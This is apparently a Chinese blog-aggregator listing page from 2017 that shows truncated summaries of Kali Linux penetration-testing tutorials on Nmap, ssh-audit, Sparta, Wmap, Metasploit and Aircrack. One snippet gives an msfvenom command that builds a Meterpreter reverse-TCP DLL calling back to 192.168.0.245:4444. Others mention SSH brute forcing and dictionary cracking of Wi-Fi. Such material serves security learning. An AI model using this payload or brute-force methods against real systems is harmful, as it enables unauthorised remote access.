一、环境搭建: 二、攻击流程: 攻击流程图解: 1.在kali linux中利用metasploit生成用于建立反向链接的dll文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > ...
分类:
其他好文 时间:
2017-08-12 21:24:43
阅读次数:
177
ls命令是list的简化形式,也是linux命令中最常用的命令之一,以下将对该命令的常用选项进行一定的介绍!ls 不带任何参数,直接列出当前目录下的所有文件!但是对于以.开始的文件是无法显示出来的,这也是一些webshell作为后门的隐藏方式之一!root@kali:~/linuxcmd#ls
test1tes..
分类:
系统相关 时间:
2017-08-11 15:50:35
阅读次数:
201
SSH服务审计工具ssh-audit SSH服务是常见的远程访问服务。通过对SSH服务进行审计,可以尝试发现对应的漏洞。Kali Linux新增一款SSH服务审计工具ssh-audit。该工具支持SSH1和SSH2协议,通过尝试连接,获取服务器上SSH服务的相关信息。它可以收集SSH连接各个阶段所使 ...
分类:
其他好文 时间:
2017-08-11 10:48:25
阅读次数:
197
0x01 Nmap介绍 Nmap是一款网络扫描和主机检测的非常有用的工具。Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统,笔者这里建议直接使用Kali Linux,因为已经预装好了Nmap,可以省去安装步骤... ...
分类:
其他好文 时间:
2017-08-11 10:06:13
阅读次数:
479
安装kali,配置好安装源,选择阿里镜像源。(网上教程很多自行搜索)通过浏览器进入搜狗官网下载(linux版本,位数根据安装kali位数定)将下载好的搜狗输入法版本从下载文件夹路径剪切到home目录下(kali界面可操作性)在home目录下看文件是否存在,然后执行apt-get-finstall-y..
分类:
其他好文 时间:
2017-08-09 15:38:51
阅读次数:
131
Sparta是一个集端口扫描、网络扫描、服务探测以及暴力破解等多项功能于一身的工具,kali中已经预装了该工具,可直接使用。 > 输入目标IP,开始扫描即可探测出开放的端口及服务 > 选中ssh服务,对其进行暴力破解 > 确认IP地址、端口、扫描服务等,上传用户名-密码字典后Run > 查看扫描lo ...
分类:
其他好文 时间:
2017-08-08 14:00:08
阅读次数:
323
0x01 Wmap简介 Wmap本身不是一个独立的漏洞扫描器,而是作为Metasploit的一个模块,结合Web漏洞和Web服务相关的模块协同工作,完成目标服务器的扫描任务,也就是说,如果我们想要使用Wmap模块就需要将它在Metasploit中载入才可以使用。 0x02 Metasploit数... ...
分类:
系统相关 时间:
2017-08-08 00:42:30
阅读次数:
1778
今天没上班,在小黑屋里看了一个一百多页的书《metasploit新手指南》,在此将笔记分享给大家。欢迎大家批评指正,共同学习进步。 metasploit新手指南 笔记 kali 0x01 metapoit基本文件结构如下: config metasploit的环境配置信息,数据库配置信息 data渗 ...
分类:
Web程序 时间:
2017-08-07 22:18:22
阅读次数:
361
1.Kali Linux 2.0 2.无线网卡(兼容Kali或已安装驱动) 3.字典 - http://www.qqtn.com/down/80787.html#szdz 0x02 方法一:Aircrack字典暴力破解 1.进入终端输入: airmon-ng 查看网卡信息 2.在终端内输... ...
分类:
系统相关 时间:
2017-08-05 19:50:21
阅读次数:
245
Linux世界介绍 给自己定级 门外汉: 不会安装操作系统 不会用虚拟机(安装和使用) 入门级: 熟悉常见的发行版,甚至装过而且能用一些特殊发行版(比如kali)做过一些简单的图形界面的使用。 会一些最基础的命令(比如cd、ps、top、ls、ifconfig等这个级别的) 基础级: 能够使用一些常 ...
分类:
系统相关 时间:
2017-08-05 19:00:45
阅读次数:
248
